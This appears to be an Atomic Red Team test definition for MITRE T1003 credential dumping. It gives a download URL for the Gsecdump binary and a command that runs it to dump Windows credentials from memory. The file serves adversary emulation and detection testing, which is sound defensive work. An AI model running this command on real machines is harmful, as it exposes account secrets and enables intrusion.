attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
  auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
  description: |
    Dump credentials from memory using Gsecdump.
  supported_platforms:
  - windows
  input_arguments:
    gsecdump_exe:
      description: Path to the Gsecdump executable
      type: path
      default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
    gsecdump_bin_hash:
      description: File hash of the Gsecdump binary file
      type: string
      default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
    gsecdump_url:
      description: Path to download Gsecdump binary file
      type: url
      default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
  dependency_executor_name: powershell
  executor:
    command: |
      "#{gsecdump_exe}" -a
    name: command_prompt